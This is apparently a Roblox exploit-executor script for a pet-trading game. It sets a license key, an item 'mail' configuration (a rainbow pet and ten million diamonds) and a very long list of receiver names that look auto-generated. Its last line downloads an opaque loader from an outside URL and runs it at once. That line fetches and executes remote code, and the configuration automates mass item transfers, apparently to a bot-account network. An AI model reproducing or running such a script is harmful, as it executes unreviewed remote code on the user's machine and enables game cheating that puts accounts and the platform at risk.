script_key = "dLOrZnynYkwuvqqaSxFmCpZvxffiETzv";
_G.GDRY_RUN = false 
_G.GMAIL_ITEMS = {
    ["Scarecrow Dog"] = {Class = "Pet", Amount = 50, IsGold = false, IsRainbow = true, IsShiny = false},
    ["Diamonds"] = {Class = "Currency", Amount = "10m"},
}
_G.GMAIL_RECEIVERS = {
"a8B3YP2p",
"c0B1BF1f",
"g3B1WT6z",
"l2B1VT3q",
"a0B2HD2s",
"n4B1SM9k",
"n2B2XH9m",
"z5B3NF9y",
"v7B3MY4v",
"j4B2XM4k",
"k4B3ZS5w",
"k4B3BN5q",
"j8B2VX9c",
"k7B1QF9l",
"d3B3PL2t",
"k9B3HJ7m",
"s1B3CD5d",
"d8B2VH1u",
"h3B2SG4y",
"v0B1XC7w",
"a3B2WR5c",
"w0B1ZH0r",
"m7B1XC7l",
"z2B3TB8m",
"x2B2PN7w",
"t6B3QB3x",
"r6B2NJ9c",
"s0B2TJ5t",
"g2B3QJ8y",
"v2B2XC4e",
"a7B2PW7t",
"r1B3YL1l",
"f3B3QN5g",
"b6B1YM4o",
"z0B3RH7q",
"w4B2JD0x",
"r3B1XN9t",
"d4B2JK2b",
"h1B1TM8n",
"k7B1VF8h",
"x4B2HB8h",
"q2B1KL0w",
"e1B3FR9a",
"u7B3PS0z",
"h7B2ZM3a",
"r4B1RT0j",
"w0B1SB0y",
"m1B3ZR5o",
"m0B3QC9l",
"p8B3PF4h",
"q6B2DK4u",
"j2B2HR7j",
"m9B1JM7v",
"s7B1FX6z",
"g6B1MC7a",
"w2B1SV9x",
"k4B3GG4o",
"z9B1KY0c",
"w9B1KJ1b",
"t9B1DQ4y",
"a7B3KS5v",
"q9B3NX4e",
"g2B2BG0t",
"e5B2ZM2a",
"l3B3BG2a",
"o9B1NV5e",
"n6B3NY2e",
"y5B3WB9r",
"r8B2QW0j",
"a5B2HQ6o",
"z1B1RX3p",
"u9B1JL1i",
"a1B1DJ9z",
"i1B3LN8w",
"j8B2NP2k",
"f0B1LK4y",
"q4B3PJ2z",
"x6B1HP0z",
"p1B2SW5h",
"o2B2PP0e",
"i0B3MV5n",
"y1B3QX2c",
"k3B3WN6t",
"q0B2XH0u",
"r6B2JD7k",
"p6B1VV8h",
"h4B2NL7p",
"d4B2GZ2m",
"l2B2RJ0p",
"o5B3RM5c",
"l1B1DX3j",
"n0B3TG5b",
"p5B2NP0t",
"b7B1JT4n",
"x0B2HP1y",
"u9B2BG5f",
"s6B1JD5q",
"v0B2CJ3r",
"d3B1SD1l",
"f9B2PC1f",
"l9B1BX9p",
"l5B1ZG1v",
"y4B3GM0p",
"d4B1MR3u",
"m8B1KB3x",
"e2B2JT9n",
"r7B2HJ4o",
"i0B1KZ8m",
"m7B3RK6a",
"f0B2QZ2p",
"d7B1XV8g",
"g9B2YV6c",
"s0B1GG2q",
"b3B2KX4i",
"n8B1VF2f",
"z6B3ZK7x",
"x1B2PL0q",
"d2B2QZ5n",
"l4B1ZM4j",
"v7B3CL3m",
"s3B2FP2z",
"c6B3FF2j",
"o8B2JC1b",
"g7B2FP8d",
"s4B3DL4h",
"g7B3RZ7o",
"p1B1CM9p",
"f8B3FK8m",
"u2B1ZN2w",
"b2B1DG4v",
"l1B3VH2p",
"s0B2RX7t",
"l3B1JR9p",
"h2B3BJ7w",
"m8B3LN2c",
"x6B3PM3o",
"e4B1FB9k",
"l2B3YP3c",
"l6B1ZQ6a",
"s0B1PD1d",
"b4B1MP2s",
"p3B1RN3z",
"a4B3PX2w",
"y6B2MX8o",
"o3B2CD1x",
"p2B3FB5a",
"b9B3RW3q",
"g2B1QX5n",
"p7B3NB5c",
"u1B3TG0h",
"u7B3CW9z",
"w6B3ZT3q",
"v6B1HQ1v",
"h9B1ZG0f",
"o7B2PW5f",
"y6B3NM3h",
"o9B1JN3t",
"v2B1PL5m",
"l4B2CB6k",
"q2B3MN1o",
"v9B1LP4p",
"n3B2GG4h",
"v4B2ZB0u",
"x9B2RQ8d",
"e1B2TQ6r",
"w7B3YG8a",
"a4B2MW8p",
"o6B3PN9s",
"p6B3HY8d",
"p2B3QB5j",
"c1B1HN8t",
"p2B1MF1k",
"f8B1TY0z",
"w6B1WP0z",
"l2B3ZL8t",
"w6B1JY3b",
"u9B3PL6l",
"n3B1MM7f",
"t1B3SL7c",
"x4B1FS5o",
"r4B1MH2m",
"i3B2LX3j",
"x8B1YW7u",
"w1B2XF9a",
"r3B3WG5p",
"r5B3PL5i",
"f2B1DF7u",
"s2B3MK2p",
"h7B3DC1h",
"a6B3VX6p",
"w3B2NQ2i",
"p9B1VC2e",
"x1B1LR3b",
"e4B3YW1b",
"p8B1ND0b",
"r3B2RH0t",
"y9B2NW5r",
"e4B2RV9w",
"e4B3QX3d",
"i3B1ZC9f",
"y1B1HB9r",
"g9B3FT3u",
"d7B3KK4d",
"m5B3FL5s",
"x2B3WB8f",
"i7B3KB6z",
"h9B3JP8r",
"y9B3XR2x",
"b5B3WZ1o",
"g7B3MV0s",
"p3B1WB3h",
"w8B3BH5u",
"o7B2XK4h",
"p3B1BC7n",
"k4B3WP1k",
"o2B1DB5v",
"n1B2RD4e",
"r1B2WG3w",
"e8B2QR4h",
"l1B2CP7h",
"y7B2NR8j",
"d8B1ZT7k",
"g7B2FV6n",
"s2B2YB4t",
"i9B3XF5g",
"w6B2CT3j",
"d8B1SC9f",
"p9B1TS2i",
"a5B3YG5r",
"r4B2NS4b",
"e1B2ZS8k",
"h7B3ZV2e",
"o5B2YT2g",
"a1B1TR6z",
"v7B3VG8g",
"z6B3RK4m",
"u3B1BH3a",
"e5B1JV5g",
"u9B1RC5p",
"w1B1JZ9v",
"o1B3HC6s",
"d5B3QP5p",
"x4B1CL4n",
"k0B3KJ2w",
"q0B3KZ1g",
"k4B3XC4y",
"x3B2FQ5i",
"a7B1VK6c",
"y9B2VB3j",
"e7B3FS1c",
"i8B1LN0l",
"r6B3CD5t",
"o6B2SR1e",
"z9B1PC9w",
"h8B2VM7e",
"s7B3QN1p",
"g2B1GN5k",
"x2B3TH8y",
"n6B2ZZ1h",
"q7B1LK3c",
"e1B2WM8y",
"z7B2BN8k",
"l3B1SF3p",
"f2B2XQ9b",
"j4B2SR6y",
"l7B3MJ6m",
"s3B2RY6a",
"n6B3KK4m",
"h0B2BB8p",
"u7B1JG2h",
"k3B1TG2o",
"z9B1DC8x",
"k1B1FG3i",
"o3B1SB9y",
"b2B3GQ0i",
"t6B1XY4l",
"k3B2VN2f",
"j0B3HZ3n",
"v7B2RV6g",
"n1B3JN3l",
"g7B2XF5j",
"u6B1GC7m",
"x2B1LB9h",
"r0B2TQ4g",
"w6B2TK1a",
"w5B2YP1l",
"a5B3SP0p",
"o6B2GT2x",
"i9B2GM2a",
"g4B3JY5h",
"t8B3TX5w",
"t4B3PW6s",
"v9B2JY3c",
"v3B1HC7d",
"q7B1DF7w",
"r7B1RQ5n",
"v5B3YZ4l",
"m3B3MV3j",
"i2B1TV2f",
"z3B2DJ2d",
"j7B1VG9u",
"n6B2WZ9p",
"u6B1BB5w",
"v0B2KM7w",
"i3B1QJ9h",
"r6B2CJ3x",
"w6B2SX8i",
"g3B2VN8y",
"p5B2XN6c",
"z0B1ZF3d",
"f9B1BS1n",
"o9B1BN6a",
"u3B3SR8k",
"j5B1LH5g",
"g3B3GK3y",
"n6B1CW6i",
"k2B1NX3i",
"e2B1ZD5j",
"q9B3CV7c",
"s9B2JM4g",
"h1B1GK4i",
"k9B3HB7r",
"q3B2NB8r",
"l4B1HJ5a",
"k7B3JM0b",
"p7B2FK4p",
"d6B2JT7o",
"m6B2TY9s",
"m1B1RZ1w",
"u5B2NF5x",
"i2B3VP6k",
"q8B3TB7c",
"j0B3DH3m",
"n4B1DL3o",
"i0B2XP7d",
"f4B3NC1c",
"q8B2DW0z",
"o8B1VF8u",
"s9B1CC0m",
"m7B2BN8z",
"n3B2XQ2r",
"w7B1SX6c",
"l7B2KF1v",
"t1B3NY2f",
"d3B1WF7k",
"u5B2TK3o",
"e0B3ST1m",
"n5B3FK0v",
"k7B3LD0r",
"y9B2WR3m",
"r7B2RC3x",
"x9B3GW2v",
"l5B3VB2m",
"f8B2NV6v",
"w0B2XB5v",
"c1B2VY7b",
"j9B2XP5b",
"p1B1PN3w",
"e2B2WR8v",
"u3B2BM0j",
"i2B2FP7f",
"g6B1PT3z",
"a3B2GX0f",
"b9B1VS2p",
"r3B2MT4k",
"h0B2KP9w",
"s7B3FD8j",
"f4B2JT1f",
"l2B1TX3s",
"i2B3YC4i",
"b5B2JW1b",
"m4B3KY8s",
"i7B2TS1o",
"a7B3CD7z",
"j7B3QN4e",
"y9B1FP8t",
"u7B2WG8m",
"b2B3VC9l",
"i9B2HL8q",
"j2B3HD3l",
"f7B3MM0z",
"d5B2PK0s",
"j1B1KF9l",
"b3B1VZ5b",
"e5B2RS4i",
"h5B1GZ8o",
"p5B2DX1e",
"k3B2BF9b",
"o9B1DC8v",
"y8B3DB4i",
"l2B3SQ9p",
"o5B2CG1i",
"l4B2SM4u",
"o4B2NV6f",
"n1B2CY3s",
"q5B3LR1j",
"j1B3FZ0s",
"i9B3PS9h",
"c9B2JD6y",
"k1B3ZJ9y",
"v7B2MY9c",
"l8B2GC9m",
"h6B3RQ4m",
"y7B3MC2d",
"a9B2KC6q",
"w8B1KK6r",
"l2B3ZY1i",
"t7B2TY2a",
"o1B2QB7d",
"s6B2YL5w",
"a8B2QH4s",
"o0B1XJ2r",
"a2B3KM6s",
"z2B3DC0b",
"n3B1QL1b",
"z5B3KY2p",
"o4B2RX9z",
"i4B2FM7c",
"y0B1ST1l",
"v9B2GM7s",
"t8B3FP8y",
"z6B3MZ6u",
"f7B1VR0g",
"f0B1YH7t",
"v5B3VM1p",
"f2B2FB1o",
"u0B1MP8u",
"t6B3DL2o",
"r5B3QH5a",
"h3B2NL5b",
"w4B1JK2u",
"t8B2JB4c",
"a4B3GF5a",
"l0B1HG2m",
"f1B1GF3b",
"w6B1XS8e",
"n9B1WN9m",
"a5B2WL1g",
"c8B3XQ4c",
"h8B3RX6k",
"e0B2TT7d",
"m8B3RT1y",
"j9B1RM8x",
"b0B1XV7c",
"g1B3TT1h",
"h7B1VK8t",
"d6B1VR2g",
"t7B3FX4d",
"h2B3TW2c",
"d7B2SD6g",
"v5B1CG7p",
"s7B3GD4f",
"n6B2LW0w",
"v0B1XK6t",
"j8B3PW5n",
"t5B3YV5r",
"m9B3FV4l",
"s3B1GR3u",
"j4B2TJ3c",
"r2B2PN8p",
"r0B1DP4j",
"z2B3CQ4z",
"e2B3QK8h",
"z1B1KS1m",
"x6B2NC9s",
"h6B1FM8o",
"q7B2JJ3q",
"e6B3HB6u",
"h3B1WB9x",
"t9B1SY5g",
"f4B2XP8h",
"h8B2BR2e",
"n8B3HR2q",
"u5B1JN0z",
"r2B3WS1f",
"w3B1QQ6n",
"m0B3NV1n",
"w3B2GB3e",
"g5B1YC7c",
"h9B1KR0r",
"p6B1TX5m",
"h1B2ZJ5e",
"l3B3LY0v",
"k3B2HF6a",
"u0B2YM9z",
"s2B2BK1b",
"i2B1HK9w",
"v8B2VN1z",
"a5B2FL0c",
"e3B1ZT0c",
"z1B2GQ5c",
"q3B3GL8j",
"t5B2YJ9v",
"i2B1HV9r",
"s3B1BZ9k",
"f2B3HW2b",
"p4B1RG1p",
"c9B3WZ1s",
"f1B1MC1f",
"i6B1RF5u",
"x2B2XQ5z",
"v6B2TS1k",
"l4B2SL7n",
"d5B1NC3o",
"t2B1WG3f",
"j3B3PY1w",
"m3B1XV8u",
"l6B1MG2z",
"i7B3LK1g",
"d3B1RJ1y",
"h6B1KJ6z",
"f6B2JC7f",
"j6B1MF2l",
"x9B3YM9s",
"e3B2RR0i",
"q6B1ND8p",
"y1B2TR1m",
"e0B2JN4g",
"u0B3FQ6b",
"y6B1DP4u",
"g8B3XV6s",
"f7B1DT4i",
"b2B2LS6r",
"l9B3GX4x",
"o4B3LR0f",
"o6B2SH9f",
"o0B1DL0h",
"k3B1CK7j",
"c3B1QD7f",
"m0B2VP6u",
"f0B3RH1j",
"w7B3RC8t",
"p1B2PF1f",
"q6B1XQ0r",
"e9B1BD1s",
"d6B1QF3y",
"b9B3BH9l",
"z0B1KT1x",
"s0B1GM5v",
"i7B3RV9u",
"m3B3MK8b",
"i8B1NV3g",
"k7B3XX0r",
"w2B2BH3a",
"p4B2CY9l",
"a0B2WS3l",
"b4B2VV3n",
"e0B2VJ4i",
"d8B2FH4n",
"v0B1QM8e",
"x3B3GK2l",
"n6B3HJ8t",
"b7B3ZM0z",
"l7B3RT2i",
"p4B1MF8a",
"h3B1SR0q",
"q0B2XC3s",
"k6B2PR0j",
"f2B2CG4c",
"d3B2NQ7o",
"v5B1GN7y",
"y3B3YD1m",
"k0B3VY8y",
"s2B2GH0u",
"r0B3DD8m",
"h5B3PF8c",
"a0B1YY6q",
"v7B3LQ9n",
"l5B1GS1r",
"g8B1FV1j",
"a8B2KD3p",
"v3B1CV9u",
"l1B3NQ2z",
"f8B2JK9e",
"p3B2JS3j",
"a7B2JJ3z",
"m6B3DH1w",
"i7B3WN5i",
"j8B2RF2e",
"y2B1RT4j",
"a7B1RC0d",
"c0B2PK0v",
"b7B1VH5b",
"e6B3RQ2d",
"v2B2WZ6u",
"l7B3LD9r",
"b2B2BY0d",
"s7B1WW4i",
"s7B1VS9x",
"q3B1PH2q",
"v8B2XH6l",
"w1B1TD0c",
"k2B3MF8v",
"w4B3NQ5c",
"l3B1CK3p",
"q1B2YT8v",
"q0B2PM4v",
"s3B3YF5n",
"s0B3MJ8l",
"a1B2ZK9g",
"p7B2LD8a",
"l8B2CB9t",
"m6B2RV8w",
"j3B2JP8c",
"g7B2DN0b",
"g4B1RC7a",
"x2B2GX3b",
"g5B1WS5r",
"u7B2ZM6w",
"h0B2WJ5g",
"q2B2SK9r",
"w1B2LW5p",
"w4B3GH6p",
"y9B3WX1e",
"h1B2MS5u",
"h2B1QK1x",
"y4B2RC7w",
"p6B1PJ5u",
"q1B2CM8g",
"q1B3HY6h",
"o0B2YP1v",
"o2B1CR2a",
"d4B2ZQ8x",
"z2B2WG9l",
"o7B2BR9r",
"y2B2NV2a",
"l4B3YB1p",
"y3B3NH6a",
"i3B2MD4g",
"d9B2SS2c",
"t0B3GG9f",
"d9B3ZK2k",
"l4B1GM5h",
"h0B3ZZ4p",
"o0B3JZ9k",
"b4B2HJ8t",
"z9B2FQ3j",
"t0B3NK1l",
"l5B1FB0q",
"p3B1CJ8o",
"h7B3RR7w",
"u4B3ND1f",
"j3B2DW3t",
"t8B1SM1q",
"b2B2QS9o",
"f0B3JB9o",
"e3B3FJ5c",
"h1B1TZ6w",
"w1B1HY4u",
"a6B2LW0s",
"f1B1FN0s",
"k8B1HZ4l",
"p6B1NY1x",
"h0B1CD0o",
"i9B1RL5y",
"d2B2KT8j",
"y1B3LQ0s",
"x3B2DL4a",
"u8B1GP0s",
"o9B3ZJ2q",
"h7B2PZ1e",
"h4B2XD9i",
"n1B3FJ5w",
"n3B1JL1k",
"c2B3YG6f",
"v5B3TW8h",
"z2B3TQ4b",
"f6B3FS0j",
"t7B3LK7g",
"f1B2XP2f",
"s3B3GG2e",
"c2B1XY4g",
"r3B1XV7h",
"h3B2YR8w",
"d6B3HK2w",
"h2B1CX6h",
"i9B1XG5f",
"s9B2ZK1g",
"e9B2VQ1a",
"g8B2KV6k",
"j4B3MX0g",
"g3B2SC8o",
"q3B2KT0b",
"y1B1RM0x",
"g3B3BC2e",
"i1B3VY4k",
"n1B2WH0h",
"h4B2GZ1z",
"k4B2HY6d",
"g5B1FT1n",
"r5B2GZ0k",
"l2B3CB7s",
"d3B2HS4m",
"b8B3VR2s",
"s0B1GN7k",
"l3B1FK0h",
"s8B3XP0h",
"x0B2KF9s",
"y0B1VY7i",
"s9B1MP7p",
"e9B3TQ9g",
"i3B2QD6l",
"p6B2GG4a",
"t0B2ZK3k",
"u4B2MQ1h",
"r2B2HC9s",
"a2B3TS3z",
"x4B1RC4y",
"x2B1LL9u",
"x5B3NM7i",
"l4B2LF1e",
"o2B2WB0k",
"v4B3PK9x",
"c7B3FK6q",
"w3B1KD3u",
"k7B2MC1d",
"d8B3WN7h",
"t3B1ZK0m",
"m5B2MZ0m",
"i1B2ZY1f",
"m5B2SM3s",
"l8B3NG7n",
"f8B3RC5i",
"c1B2YX4o",
"r2B1JL8c",
"h5B3MG5s",
"b7B2GN5b",
"t8B1DQ2c",
"a5B1CY6a",
"u5B1CD4l",
"f9B2CC2x",
"d5B3RV2y",
"w2B2PS1r",
"o4B1LZ9j",
"e2B2PW1e",
"r8B3PP6g",
"y0B2FN3m",
"k2B2RV9j",
"x4B2ZB1w",
"x4B3QJ8f",
"j9B3TS2h",
"k6B3CH2e",
"w0B3TT8z",
"n7B3JW4d",
"h9B3HW1s",
"d7B3VL7b",
"g7B2CV2o",
"f1B2VZ0b",
"d9B2KY9p",
"l1B3ZX4q",
"o0B2MT0y",
"n5B1LY9a",
"g2B1QW7s",
"q0B1YX3r",
"n6B1TW4h",
"f6B1FT3p",
"c5B3WS4k",
"l0B1GG9w",
"y5B2BW1u",
"a3B1PY3m",
"d7B1WD9v",
"i7B2MF1b",
"s4B3NK3s",
"x9B1PP2a",
"p0B3HX1o",
"w1B1VR8x",
"j6B1XJ5s",
"k6B2FG9h",
"r5B1TL7m",
"f2B2CC0j",
"q3B3XT2r",
"i8B2KG4e",
"k1B3FN7a",
"p8B3VR1u",
"o5B2HH1y",
"x7B3TW7q",
"d6B3LQ6l",
"b4B2RT2u",
"o3B1RS7h",
"d4B2PQ1b",
"c1B1LF7p",
"q4B1FN5c",
"a2B3BM1k",
"j4B2KG6p",
"k6B3QJ8r",
"i9B2CH0t",
"k5B2BJ9b",
"c3B2GF0f",
"x2B2KR9n",
"t8B3TP7u",
"a9B2FZ8y",
"h1B2XK9c",
"y2B2HK6i",
"b0B1QB8u",
"y7B1KP3v",
"m5B2BJ3j",
"y4B1RX0a",
"p3B1HX2s",
"f3B2CD3t",
"l1B2ZL1x",
"o2B1YM7g",
"l1B1RQ5j",
"j3B1GN3a",
"v0B2KW6x",
"b9B2XZ8r",
"e8B3ZC2h",
"t1B3CW7k",
"c1B1VW5w",
"e6B2XH6u",
"i0B2XZ3c",
"b2B3VL3c",
"b8B3BB6s",
"v5B3LB1r",
"i8B1ZX1b",
"u2B2JS1g",
"j8B1NN4d",
"f3B3VR2q",
"z9B2PD3q",
"e5B2LV1z",
"u8B2HG6s",
"x2B3JD0u",
"m4B3RP4f",
"h9B3PK1s",
"z9B3SD1b",
"i3B1PL8d",
"b6B1DV3u",
"m0B3PD6s",
"g6B1BK0b",
"y1B3DJ5s",
"i6B3QV4b",
"v7B2HT7e",
"e7B3XR5i",
"n8B3KD0e",
"w1B3NN8z",
"e5B1QV5u",
"z7B3KR4v",
"o7B2CW2h",
"o4B1VW5t",
"d8B2KW1q",
"c4B3WT2c",
"w1B2KQ8b",
"n7B2VG7y",
"b1B3BZ3b",
"c1B1BH1m",
"i7B1LC9t",
"w6B1MV2q",
"g0B2PP6i",
"e5B1KD8a",
"c5B2MN7f",
"w7B3TQ7r",
"q3B1BM9d",
"z3B1GZ2c",
"u9B3GM2n",
"f5B2HX6g",
"b1B2NS7t",
"a2B3NV6m",
"q6B2RR1z",
"n4B1BM0n",
"m7B2BQ5c",
"e6B3FP6v",
"l6B3KR1h",
"d6B3QP5c",
"z6B2HS5o",
"f7B1ZB1r",
"p7B1ZS7c",
"h5B3BQ7q",
"x3B3ZL1d",
"h8B2WK8d",
"h2B2LP6y",
"s0B3LB8f",
"y9B1XX8g",
"k9B1TY1u",
"u4B3ZR4m",
"p8B1KP0z",
"j0B1QN0z",
"a9B2CC1c",
"y6B2RS3z",
"l1B2JX6l",
"i2B3XZ0e",
"q6B3YT7x",
"o1B3YM8a",
"o5B1NC6l",
"j6B1HN8u",
"t4B1CP7j",
"v8B3WD0d",
"q1B3HC0d",
"x2B2MP6u",
"h7B1VN3q",
"j8B2MB8l",
"y2B3BS7r",
"w3B3KW2l",
"e2B2PB3s",
"p6B3GZ0c",
"c2B2XX4t",
"e5B3FF1p",
"e4B1CB3n",
"a2B1WS3w",
"d2B2HM0w",
"r2B2JL5r",
"f1B3MS0p",
"j7B2BX7t",
"c8B1FH0r",
"t5B3RR2f",
"j6B2RW0m",
"s0B1KG6g",
"j1B1BQ0d",
"v6B2DV5c",
"n1B2QG0d",
"u3B2GT3d",
"b3B1ZF6f",
"a3B2MG1i",
"n5B2RZ4p",
"r3B1XB0f",
"u6B2DK6f",
"b7B1YJ3t",
"j0B3BZ1o",
"p1B1DR7a",
"n1B2ZN0w",
"z6B2HF6v",
"l3B1FM2q",
"k0B2WS1v",
"i0B3MD4g",
"f9B2BW5g",
"n2B1WT4c",
"g8B1WQ5y",
"a0B2TD2f",
"r3B1PQ5b",
"p2B3ZG7k",
"g5B1QG3l",
"r6B2CR8k",
"a8B3HR0p",
"m6B3DR3g",
"r1B2VP9i",
"t6B2WK4l",
"h1B2ZH0d",
"g5B3RD4y",
"f2B3JG4z",
"m4B2CC2m",
"r9B1XP3j",
"q3B3RS0q",
"f2B3MZ3t",
"m3B3GV1i",
"z6B3MV3y",
"z8B3HN8g",
"d0B1NK6p",
"i6B2KT0r",
"s0B3XH2c",
"b6B1VJ5a",
"q6B3JJ6d",
"i2B1KX2w",
"k4B2CP2l",
"u4B3XP0f",
"p9B1SQ6z",
"q6B1CF4d",
"b1B3QX6e",
"f7B3YC0u",
"o0B3GF8w",
"p8B2VT6j",
"y3B3WR7r",
"x6B2PZ9j",
"g1B2YW3t",
"v5B2JZ9l",
"l5B2WG6w",
"a8B3GL4h",
"s9B1QR2d",
"a8B1SP5h",
"c7B2FZ1m",
"x0B1FK4l",
"q1B1MD9o",
"r7B3VD8u",
"w9B3SK5a",
"p2B2QN8v",
"p3B3DL3o",
"n2B3SW7b",
"t9B1PV5q",
"t6B2PG4f",
"q3B2CG2f",
"u8B1BN5z",
"g3B1RV1a",
"z9B1VX4z",
"n2B3HG9u",
"d7B3XH2u",
"h8B2CN6w",
"e9B1CV2s",
"x8B3PY5d",
"t0B3TV2v",
"w6B3WV4t",
"w2B1PG5e",
"p5B1PH2f",
"p3B2XK8a",
"x5B1TN0r",
"s4B3BW2s",
"n9B1WZ5g",
"b1B1PL9c",
"h4B3KG1k",
"t9B3DJ0d",
"i6B3QK1u",
"l8B1JF4d",
"o6B2NW0f",
"c0B1GQ1r",
"a9B2XN6k",
"o1B2FD0y",
"b4B1PS6b",
"v3B2DY5w",
"l6B1SJ4p",
"y7B2YY6x",
"g2B2BD1g",
"w4B3WT7f",
"u8B2ST8s",
"t0B3ZL2b",
"i1B1TD7v",
"t3B1JW2q",
"m3B1JX4d",
"d5B2LS7j",
"g9B1ZC8b",
"d8B3BM9p",
"d0B3KL0w",
"v3B1LF2p",
"b2B2VG6k",
"o6B1RY4t",
"a6B3TZ6m",
"j5B1NJ2x",
"a3B2BP0p",
"w7B2BG2i",
"l6B3JP8n",
"f0B2LH2c",
"d5B2PS4f",
"d5B1KZ1x",
"o7B2TX3e",
"b1B3LV5j",
"x8B1BP2r",
"m7B1VT1b",
"x5B3HZ6p",
"o2B2LQ2s",
"h7B2ZL1a",
"i8B3QJ0l",
"x2B3TN4i",
"d7B1LJ1d",
"b8B3FM1l",
"w2B3VX3g",
"f3B3TB8a",
"i3B3LG7d",
"n1B2ZK0p",
"r0B1FD2u",
"y2B1SM2d",
"r2B3MY4g",
"r2B2FR7c",
"r2B3NV7m",
"n8B2NC7n",
"l0B2ZC8e",
"d8B3MW3s",
"k4B2XV5n",
"e0B2CJ7k",
"o4B1BX1b",
"p3B3QY8p",
"f8B3BG0u",
"f1B1GM6b",
"v6B3ZZ9c",
"c6B1RZ6g",
"f0B2HV9p",
"h0B2WL6z",
"n5B2VJ8q",
"w9B2GD4v",
"p9B1JN5e",
"y9B2VB0w",
"n9B3JT3p",
"f8B1HJ9e",
"i3B1KM7g",
"z9B2QL6b",
"b6B2MS7n",
"w7B3KJ0e",
"o2B2WV6p",
"o5B1YL6a",
"n1B1XN8k",
"v6B1NQ3j",
"v2B2KK5m",
"n9B1HJ7j",
"o2B3CP7y",
"g5B2BF1u",
"v4B2GV9d",
"o5B2PT1t",
"w3B3DL5g",
"j2B3PM7u",
"t7B2KM2g",
"r9B2JR6j",
"x0B2FW9t",
"e0B1FZ3c",
"v0B2HH3g",
"t7B1DN6f",
"z2B3QN5i",
"o0B1RF0e",
"n0B2HG6f",
"r4B1MQ4y",
"i1B2CV6p",
"o8B2WW1d",
"y5B2SX9t",
"n2B1LG6b",
"w4B3PH9j",
"y9B3FY1o",
"w3B2KG1v",
"r3B3DY5l",
"b2B3YY7i",
"z2B1DF9k",
"w4B1WY2b",
"d5B1QS8t",
"p4B1VB2v",
"t7B2QY2m",
"v5B2BF6p",
"u4B1YF6u",
"l9B2RT8s",
"e1B1HR4s",
"n2B1VN2b",
"w0B2FK0e",
"p1B1GR6p",
"o8B3CJ7a",
"v7B1ZG5j",
"n1B2RK4j",
"i2B2TS2c",
"t9B1TN4w",
"q5B3MW6z",
"h3B1VT3u",
"e8B2YG3c",
"f3B2TX1l",
"n4B3GS2n",
"d9B3QF0c",
"i0B3KN7r",
"r9B3FT2q",
"c4B2CF2x",
"d6B2QL5g",
"m7B1DV7v",
"d2B2YL0f",
"v6B3HK3y",
"s1B1LG4k",
"i1B3ST5n",
"k9B1MC0n",
"d5B3VF3j",
"t8B2WX5p",
"k9B3VS4z",
"i5B1SL1t",
"v3B1PT0z",
"e5B3QF9x",
"h5B3BJ7o",
"i4B3HL6x",
"j4B3LP0d",
"p3B3GW9e",
"o9B3DJ9b",
"l3B2DQ4w",
"q4B1GX1v",
"w5B1YS0q",
"z3B2WG3j",
"a6B2QD4g",
"j9B3MF2a",
"p8B1PW6h",
"b0B2JX4t",
"k8B2LY6x",
"o2B2WD3j",
"n7B1LM0z",
"e7B3RF4k",
"p3B2BM7a",
"b8B3HN2r",
"i5B1SS7x",
"j3B2MP3a",
"d2B3TP5x",
"n6B3YC5n",
"q6B2XV6i",
"o6B3XB2e",
"z8B3GH5l",
"l8B1TQ9j",
"u9B1MK6e",
"p1B2PR5s",
"d0B2NH1x",
"m0B1MS3v",
"h7B1HX9o",
"e9B1DZ2z",
"s3B1CS9b",
"s5B2MC0z",
"e9B3QW2y",
"o6B1MQ0w",
"j0B1TQ1p",
"v4B2MD1u",
"d8B1HB7f",
"c4B2HC7t",
"m8B3ZZ6w",
"f9B1XZ4w",
"h6B1PY4v",
"f9B3BN4q",
"y1B3ND4m",
"d7B3LC0y",
"e3B2NJ1a",
"s9B1KN3t",
"u9B3XP0x",
"f1B3BV5p",
"m3B2QZ3l",
"j2B1CX3m",
"b1B1GH0p",
"v5B3NC8m",
"w7B3PR6w",
"y9B2SQ2p",
"m6B1LD1g",
"g4B2MS0g",
"m4B1FL4l",
"c4B3TH4t",
"s4B1GW9r",
"w4B1WP3o",
"d1B2DB7w",
"c6B1KC7k",
"c7B1VH3m",
"j4B2LZ1l",
"m7B1WL1g",
"d7B1DD9d",
"l6B2WS3t",
"r8B2XY3w",
"u4B2BV8u",
"x7B3GS1e",
"d7B2RW8j",
"g5B3DM7q",
"f3B2ND3v",
"g9B3SD8n",
"g8B2NQ1x",
"p7B1QB0k",
"s2B3CP6z",
"e8B1ZH9o",
"a1B3LN0i",
"e0B2TQ1e",
"g7B1MT8j",
"z0B3ZZ9t",
"o8B2QH0x",
"h1B1KP1u",
"z1B1GH8w",
"z7B2LD5a",
"x2B2YC9j",
"i5B1KQ8z",
"m8B1QX5b",
"g3B2HN8w",
"p8B2MB8j",
"r1B2BF1e",
"c5B1YT5d",
"s3B1CV1d",
"v2B1SM5j",
"q2B2SX2a",
"r9B1PH4b",
"q9B2DX8i",
"u0B1LP0m",
"j0B3PB5y",
"h8B2VR7u",
"n5B1GN5q",
"n0B2WV3e",
"x4B2GS4p",
"e4B1NB0j",
"p2B1QG1x",
"g8B2CQ7k",
"n3B2BP2v",
"x4B2WF0i",
"r6B3TW5w",
"b7B3WR9d",
"z2B3SC0y",
"d8B2KX8n",
"g7B1FP8u",
"c1B2PX7k",
"j9B2FW0u",
"s5B1LP2h",
"q4B2NB3u",
"q4B1YX1x",
"m4B1VD4m",
"h6B2BG3t",
"k0B3SZ0b",
"n5B2FK4m",
"c4B2WH6a",
"m5B1FT7a",
"c8B1TL1d",
"s4B3CZ7n",
"j3B3HH1k",
"r1B3WH4d",
"g5B2DD4h",
"n2B1LF5j",
}
_G.GMAIL_DELAY  = 7.1
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/8f386eb537ee7b37a8f0ad37fe6dbc60.lua"))()
